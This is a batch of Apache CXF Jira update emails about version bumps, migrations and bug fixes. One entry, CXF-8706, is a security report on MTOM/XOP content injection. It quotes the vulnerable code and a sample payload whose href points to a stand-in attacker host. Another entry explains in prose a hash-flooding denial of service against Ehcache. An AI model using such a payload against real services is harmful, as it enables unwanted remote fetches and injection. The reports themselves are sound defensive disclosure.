[jira] [Updated] (CXF-8765) Option to remove Ehcache
[ https://issues.apache.org/jira/browse/CXF-8765?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8765: -- Fix Version/s: 4.1.0 3.7.0 (was: 4.0.0) (was: 3.6.0) > Option to remove Ehcache > > > Key: CXF-8765 > URL: https://issues.apache.org/jira/browse/CXF-8765 > Project: CXF > Issue Type: Improvement > Components: JAX-RS Security >Reporter: Ben Manes >Assignee: Andriy Redko >Priority: Major > Fix For: 4.1.0, 3.7.0 > > > Is it possible to remove or replace Ehcache with an alternative provider? For > example if JCache was used then one could exclude this dependency and > register an alternative. > I would like to ban Ehcache3 from my dependency tree because it is a trivial > target for a hash flooding denial of service attack. Unfortunately this has > been known and ignored by their team since 2015, and I am still able to > trivially introduce this problem in my test workloads (outside of CXF). For > example, in one simple case Ehcache takes 67 minutes whereas a simple LRU > takes 13 seconds. While I have not seen this exploited, at work we are > undergoing SOC-2 compliance and I'd like to shore up known deficiencies by > banning it company-wide. > For background, the problem is that Ehcache uses a forked version of > ConcurrentHashMap. That map uses a very cheap and weak hash function because > it degrades to a red-black tree on collisions, so the problems are mitigated. > Ehcache uses an sampling policy that relies on the entries being uniformly > distributed during its traversal, which if not degrades to O\(n\). It is > trivial to construct a query pattern that is unfriendly to LRU, triggers an > eviction, and results in threads being stuck performing this eviction scan > instead of servicing requests. The solution is to update their fork with a > more robust hash function or ensure that the keys use a good hashCode, which > then drops this runtime to 1.4 minutes. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8679) Upgrade to Netty 5
[ https://issues.apache.org/jira/browse/CXF-8679?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8679: -- Fix Version/s: 3.7.0 4.1.0 (was: 4.0.0) (was: 3.6.0) > Upgrade to Netty 5 > -- > > Key: CXF-8679 > URL: https://issues.apache.org/jira/browse/CXF-8679 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.1.0, 3.7.0 > > > https://github.com/netty/netty/releases/tag/netty-5.0.0.Alpha4 > https://github.com/netty/netty/pull/12735 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8797) NameBinding ignored when implementing interface
[
https://issues.apache.org/jira/browse/CXF-8797?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Andriy Redko updated CXF-8797:
--
Fix Version/s: 4.0.1
3.5.6
3.4.11
(was: 4.0.0)
(was: 3.5.5)
(was: 3.4.10)
> NameBinding ignored when implementing interface
> ---
>
> Key: CXF-8797
> URL: https://issues.apache.org/jira/browse/CXF-8797
> Project: CXF
> Issue Type: Bug
> Components: JAX-RS
>Affects Versions: 3.5.4, 3.4.9
>Reporter: Jens Kleine-Herzbruch
>Assignee: Andriy Redko
>Priority: Major
> Fix For: 3.6.0, 4.0.1, 3.5.6, 3.4.11
>
>
> I have the following setup:
> 1. An interface that carries most of the JAX-RS annotations ({{@Path}},
> {{@GET}}, etc.). This interface is provided by a third party.
> 2. A service implementing this interface. This is what I'm developing myself.
> It does not carry any JAX-RS annotations itself.
> 3. A provider ({{ContainerResponseFilter}} in my case) that I now want to
> attach to some of the operations with {{@NameBinding}}.
> Obviously, I can only add the {{@NameBinding}} annotation to the
> implementation class. It looks to me like CXF is only checking against the
> interface carrying the main JAX-RS annotations at runtime, however, so the
> filter is never called.
> If I remove the NameBinding entirely and run the filter as a global filter,
> it works as expected, but of course that's not the intent here.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
[jira] [Updated] (CXF-8691) Logging Feature - Sensitive element with arrays
[
https://issues.apache.org/jira/browse/CXF-8691?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Andriy Redko updated CXF-8691:
--
Fix Version/s: 4.0.1
3.5.6
3.4.11
(was: 4.0.0)
(was: 3.5.5)
(was: 3.4.10)
> Logging Feature - Sensitive element with arrays
> ---
>
> Key: CXF-8691
> URL: https://issues.apache.org/jira/browse/CXF-8691
> Project: CXF
> Issue Type: Bug
> Components: JAX-RS
>Affects Versions: 3.4.0, 3.5.1
>Reporter: Daniel
>Assignee: Andriy Redko
>Priority: Minor
> Labels: Logging
> Fix For: 3.6.0, 4.0.1, 3.5.6, 3.4.11
>
>
> Hi,
> I am trying to use the LoggingFeature within cxf-rt and hide sensitive
> element names.
> The code I use looks like the following:
>
> {code:java}
> LoggingFeature loggingFeature = new LoggingFeature();
> loggingFeature.setLogBinary(false);
> loggingFeature.setPrettyLogging(true);
> loggingFeature.setLogMultipart(false);
> loggingFeature.addSensitiveElementNames(new
> HashSet<>(Arrays.asList("password")));
> {code}
> Payload:
> {code:java}
> private final String shortName;
> private final char[] password;
> {code}
>
> Output:
>
> {code:java}
> [services.MyWebservicePort.REQ_OUT] INFO - REQ_OUT
> Address: http://
> HttpMethod: POST
> Content-Type: application/json
> ExchangeId: 560b73ae-e7e0-4687-9674-19ee72995a08
> Headers: {Accept=text/plain, Accept-Encoding=gzip;q=1.0, identity; q=0.5,
> *;q=0, Content-Type=application/json}
> Payload:
> {"shortName":"UserName","password":["G","e","h","e","i","m","1","2","3","!"]}
> {code}
> As you can see, my password is not hidden in the output of the payload. It is
> important to mention, that the field "password" in my code is declared as a
> char-array.
> However, if I add "shortName" to the sensetiveElementNames, everything works
> as expected. The shortName is hidden (XXX), due to it beeing declared as a
> String.
> I looked at the source code an tracked the problem down to a regex.
> "password" is not found, as the value is an array (MarkSensetiveHelper.java)
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
[jira] [Updated] (CXF-8743) Update to GraalVM 22.3
[ https://issues.apache.org/jira/browse/CXF-8743?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8743: -- Fix Version/s: 3.5.6 3.4.11 > Update to GraalVM 22.3 > -- > > Key: CXF-8743 > URL: https://issues.apache.org/jira/browse/CXF-8743 > Project: CXF > Issue Type: Improvement > Components: graalvm >Affects Versions: 3.5.3, 3.4.8 >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 3.6.0, 4.1.0, 3.5.6, 3.4.11 > > > https://github.com/graalvm/graalvm-ce-builds/releases/tag/vm-22.2.0 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8743) Update to GraalVM 22.3
[ https://issues.apache.org/jira/browse/CXF-8743?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8743: -- Fix Version/s: 4.1.0 (was: 3.5.5) (was: 3.4.10) > Update to GraalVM 22.3 > -- > > Key: CXF-8743 > URL: https://issues.apache.org/jira/browse/CXF-8743 > Project: CXF > Issue Type: Improvement > Components: graalvm >Affects Versions: 3.5.3, 3.4.8 >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 3.6.0, 4.1.0 > > > https://github.com/graalvm/graalvm-ce-builds/releases/tag/vm-22.2.0 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (CXF-8706) CXF MTOM handler allow content injection
[
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Andriy Redko resolved CXF-8706.
---
Resolution: Fixed
> CXF MTOM handler allow content injection
>
>
> Key: CXF-8706
> URL: https://issues.apache.org/jira/browse/CXF-8706
> Project: CXF
> Issue Type: Bug
> Components: JAXB Databinding
>Affects Versions: 3.5.2
>Reporter: Chunqing Lin
>Assignee: Andriy Redko
>Priority: Major
> Fix For: 4.0.0, 3.6.0, 3.5.5, 3.4.10
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled,
> Unmarshaller allows XOP Include tag to have href attributes that allow any
> protocols. According to the W3C MTOM spec, only "cid:" should be allowed for
> href scheme.
> The affected call stack is:
> AttachmentUtil.getAttachmentDataSource(String, Collection)
> line: 554
> JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
> MTOMDecorator.startElement(TagName) line: 70
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId,
> Collection atts) {
> // Is this right? - DD
> if (contentId.startsWith("cid:")) {
> try {
> contentId = URLDecoder.decode(contentId.substring(4),
> StandardCharsets.UTF_8.name());
> } catch (UnsupportedEncodingException ue) {
> contentId = contentId.substring(4);
> }
> return loadDataSource(contentId, atts);
> } else if (contentId.indexOf("://") == -1) {
> return loadDataSource(contentId, atts);
> } else {// should only take cid for XOP
> try {
> return new URLDataSource(new URL(contentId));
> } catch (MalformedURLException e) {
> throw new Fault(e);
> }
> }
> }
>
> The exploit can send payload containing:
> http://attackers.site/exploit/payload";
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
[jira] [Assigned] (CXF-8774) Migration path for jaxb2-basics
[ https://issues.apache.org/jira/browse/CXF-8774?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko reassigned CXF-8774: - Assignee: Andriy Redko > Migration path for jaxb2-basics > --- > > Key: CXF-8774 > URL: https://issues.apache.org/jira/browse/CXF-8774 > Project: CXF > Issue Type: Sub-task >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.0 > > > Affected modules: > cxf-tools-wadlto-jaxrs / WADLToJavaTest.java > Project: > [https://github.com/highsource/jaxb2-basics] > Forks: > [https://github.com/patrodyne/hisrc-basicjaxb] > Related pull requests: > [https://github.com/apache/cxf/pull/1007] > https://github.com/apache/cxf/pull/1013 > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Assigned] (CXF-8763) Migrate to Jakarta WebSocket (from Jetty Websockets)
[ https://issues.apache.org/jira/browse/CXF-8763?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko reassigned CXF-8763: - Assignee: Andriy Redko > Migrate to Jakarta WebSocket (from Jetty Websockets) > > > Key: CXF-8763 > URL: https://issues.apache.org/jira/browse/CXF-8763 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > Migrate from Jetty WebSockets to Jakarta WebSockets -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8763) Migrate to Jakarta WebSocket (from Jetty Websockets)
[ https://issues.apache.org/jira/browse/CXF-8763?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8763: -- Fix Version/s: 4.0.1 (was: 4.0.0) > Migrate to Jakarta WebSocket (from Jetty Websockets) > > > Key: CXF-8763 > URL: https://issues.apache.org/jira/browse/CXF-8763 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > Migrate from Jetty WebSockets to Jakarta WebSockets -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8763) Migrate to Jakarta WebSocket (from Jetty Websockets)
[ https://issues.apache.org/jira/browse/CXF-8763?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8763: -- Summary: Migrate to Jakarta WebSocket (from Jetty Websockets) (was: Migration path for Jakarta WebSocket) > Migrate to Jakarta WebSocket (from Jetty Websockets) > > > Key: CXF-8763 > URL: https://issues.apache.org/jira/browse/CXF-8763 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Priority: Major > Fix For: 4.0.0 > > > Migrate from Jetty WebSockets to Jakarta WebSockets -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8763) Migration path for Jakarta WebSocket
[ https://issues.apache.org/jira/browse/CXF-8763?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8763: -- Parent: (was: CXF-8371) Issue Type: Improvement (was: Sub-task) > Migration path for Jakarta WebSocket > > > Key: CXF-8763 > URL: https://issues.apache.org/jira/browse/CXF-8763 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Priority: Major > Fix For: 4.0.0 > > > Migrate from Jetty WebSockets to Jakarta WebSockets -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8758) Migration path for Wiremock (Jetty 11/JakartaEE)
[ https://issues.apache.org/jira/browse/CXF-8758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8758: -- Summary: Migration path for Wiremock (Jetty 11/JakartaEE) (was: Migration path for Wiremock (Jetty 11)) > Migration path for Wiremock (Jetty 11/JakartaEE) > > > Key: CXF-8758 > URL: https://issues.apache.org/jira/browse/CXF-8758 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > [https://github.com/wiremock/wiremock/issues/1760] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8758) Migration path for Wiremock
[ https://issues.apache.org/jira/browse/CXF-8758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8758: -- Parent: (was: CXF-8371) Issue Type: Improvement (was: Sub-task) > Migration path for Wiremock > --- > > Key: CXF-8758 > URL: https://issues.apache.org/jira/browse/CXF-8758 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.0 > > > [https://github.com/wiremock/wiremock/issues/1760] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8758) Migration path for Wiremock (Jetty 11)
[ https://issues.apache.org/jira/browse/CXF-8758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8758: -- Summary: Migration path for Wiremock (Jetty 11) (was: Migration path for Wiremock) > Migration path for Wiremock (Jetty 11) > -- > > Key: CXF-8758 > URL: https://issues.apache.org/jira/browse/CXF-8758 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > [https://github.com/wiremock/wiremock/issues/1760] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8758) Migration path for Wiremock
[ https://issues.apache.org/jira/browse/CXF-8758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8758: -- Fix Version/s: 4.0.1 (was: 4.0.0) > Migration path for Wiremock > --- > > Key: CXF-8758 > URL: https://issues.apache.org/jira/browse/CXF-8758 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > [https://github.com/wiremock/wiremock/issues/1760] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (CXF-8790) Update the migration guide
[ https://issues.apache.org/jira/browse/CXF-8790?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko resolved CXF-8790. --- Resolution: Fixed > Update the migration guide > -- > > Key: CXF-8790 > URL: https://issues.apache.org/jira/browse/CXF-8790 > Project: CXF > Issue Type: Sub-task >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.0 > > > https://cwiki.apache.org/confluence/display/CXF20DOC/4.0+Migration+Guide -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8678) Update to Apache HttpClient5 5.2
[ https://issues.apache.org/jira/browse/CXF-8678?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8678: -- Fix Version/s: 3.6.0 > Update to Apache HttpClient5 5.2 > > > Key: CXF-8678 > URL: https://issues.apache.org/jira/browse/CXF-8678 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 3.6.0, 4.0.1 > > > Once Apache HttpClient5 5.2 is out, we could refactor the > [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] > to use HttpContext for TLS lookup propagation (much like 4.x does). > Currently, without context-aware settings, AsyncHTTPConduitFactory caches the > client upon first AsyncHTTPConduit connection. However, if there are more > than one AsyncHTTPConduit, each with different TLS settings, the client is > not recreated and as such, those TLS settings are not taken into account. > > https://mvnrepository.com/artifact/org.apache.httpcomponents.client5/httpclient5/5.2 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8606) Introduce HTTP/2 Transport: client-side support
[ https://issues.apache.org/jira/browse/CXF-8606?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8606: -- Fix Version/s: 4.0.1 > Introduce HTTP/2 Transport: client-side support > --- > > Key: CXF-8606 > URL: https://issues.apache.org/jira/browse/CXF-8606 > Project: CXF > Issue Type: Sub-task >Affects Versions: 3.4.5 >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 3.6.0, 4.0.1 > > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8147) Portable features should be the default choice (instead of CXF's specific ones)
[ https://issues.apache.org/jira/browse/CXF-8147?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8147: -- Fix Version/s: 4.1.0 > Portable features should be the default choice (instead of CXF's specific > ones) > --- > > Key: CXF-8147 > URL: https://issues.apache.org/jira/browse/CXF-8147 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.1.0 > > > The Portable features should be the default choice going forward, instead of > CXF's proprietary ones. They should be annotated with JAX-RS @Provider > annotation (where it makes sense) and picked up by automatic discovery > mechanisms. > > CC [~romain.manni-bucau] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8678) Update to Apache HttpClient5 5.2
[ https://issues.apache.org/jira/browse/CXF-8678?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8678: -- Fix Version/s: 4.0.1 > Update to Apache HttpClient5 5.2 > > > Key: CXF-8678 > URL: https://issues.apache.org/jira/browse/CXF-8678 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.1 > > > Once Apache HttpClient5 5.2 is out, we could refactor the > [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] > to use HttpContext for TLS lookup propagation (much like 4.x does). > Currently, without context-aware settings, AsyncHTTPConduitFactory caches the > client upon first AsyncHTTPConduit connection. However, if there are more > than one AsyncHTTPConduit, each with different TLS settings, the client is > not recreated and as such, those TLS settings are not taken into account. > > https://mvnrepository.com/artifact/org.apache.httpcomponents.client5/httpclient5/5.2 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8678) Update to Apache HttpClient5 5.2
[ https://issues.apache.org/jira/browse/CXF-8678?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8678: -- Fix Version/s: (was: 4.0.0) > Update to Apache HttpClient5 5.2 > > > Key: CXF-8678 > URL: https://issues.apache.org/jira/browse/CXF-8678 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > > Once Apache HttpClient5 5.2 is out, we could refactor the > [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] > to use HttpContext for TLS lookup propagation (much like 4.x does). > Currently, without context-aware settings, AsyncHTTPConduitFactory caches the > client upon first AsyncHTTPConduit connection. However, if there are more > than one AsyncHTTPConduit, each with different TLS settings, the client is > not recreated and as such, those TLS settings are not taken into account. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8678) Update to Apache HttpClient5 5.2
[ https://issues.apache.org/jira/browse/CXF-8678?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8678: -- Description: Once Apache HttpClient5 5.2 is out, we could refactor the [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] to use HttpContext for TLS lookup propagation (much like 4.x does). Currently, without context-aware settings, AsyncHTTPConduitFactory caches the client upon first AsyncHTTPConduit connection. However, if there are more than one AsyncHTTPConduit, each with different TLS settings, the client is not recreated and as such, those TLS settings are not taken into account. https://mvnrepository.com/artifact/org.apache.httpcomponents.client5/httpclient5/5.2 was:Once Apache HttpClient5 5.2 is out, we could refactor the [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] to use HttpContext for TLS lookup propagation (much like 4.x does). Currently, without context-aware settings, AsyncHTTPConduitFactory caches the client upon first AsyncHTTPConduit connection. However, if there are more than one AsyncHTTPConduit, each with different TLS settings, the client is not recreated and as such, those TLS settings are not taken into account. > Update to Apache HttpClient5 5.2 > > > Key: CXF-8678 > URL: https://issues.apache.org/jira/browse/CXF-8678 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > > Once Apache HttpClient5 5.2 is out, we could refactor the > [hc5/AsyncHTTPConduit.java|https://github.com/apache/cxf/pull/923/files#diff-ffdced03fe3494b30838dad9d488dd80fceb4c2f484eb9ff89fc25b80e5e1490] > to use HttpContext for TLS lookup propagation (much like 4.x does). > Currently, without context-aware settings, AsyncHTTPConduitFactory caches the > client upon first AsyncHTTPConduit connection. However, if there are more > than one AsyncHTTPConduit, each with different TLS settings, the client is > not recreated and as such, those TLS settings are not taken into account. > > https://mvnrepository.com/artifact/org.apache.httpcomponents.client5/httpclient5/5.2 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8147) Portable features should be the default choice (instead of CXF's specific ones)
[ https://issues.apache.org/jira/browse/CXF-8147?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8147: -- Fix Version/s: (was: 4.0.0) > Portable features should be the default choice (instead of CXF's specific > ones) > --- > > Key: CXF-8147 > URL: https://issues.apache.org/jira/browse/CXF-8147 > Project: CXF > Issue Type: Improvement >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > > The Portable features should be the default choice going forward, instead of > CXF's proprietary ones. They should be annotated with JAX-RS @Provider > annotation (where it makes sense) and picked up by automatic discovery > mechanisms. > > CC [~romain.manni-bucau] -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8606) Introduce HTTP/2 Transport: client-side support
[ https://issues.apache.org/jira/browse/CXF-8606?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8606: -- Fix Version/s: (was: 3.5.5) (was: 3.4.10) > Introduce HTTP/2 Transport: client-side support > --- > > Key: CXF-8606 > URL: https://issues.apache.org/jira/browse/CXF-8606 > Project: CXF > Issue Type: Sub-task >Affects Versions: 3.4.5 >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 4.0.0, 3.6.0 > > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (CXF-8606) Introduce HTTP/2 Transport: client-side support
[ https://issues.apache.org/jira/browse/CXF-8606?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Andriy Redko updated CXF-8606: -- Fix Version/s: (was: 4.0.0) > Introduce HTTP/2 Transport: client-side support > --- > > Key: CXF-8606 > URL: https://issues.apache.org/jira/browse/CXF-8606 > Project: CXF > Issue Type: Sub-task >Affects Versions: 3.4.5 >Reporter: Andriy Redko >Assignee: Andriy Redko >Priority: Major > Fix For: 3.6.0 > > -- This message was sent by Atlassian Jira (v8.20.10#820010)
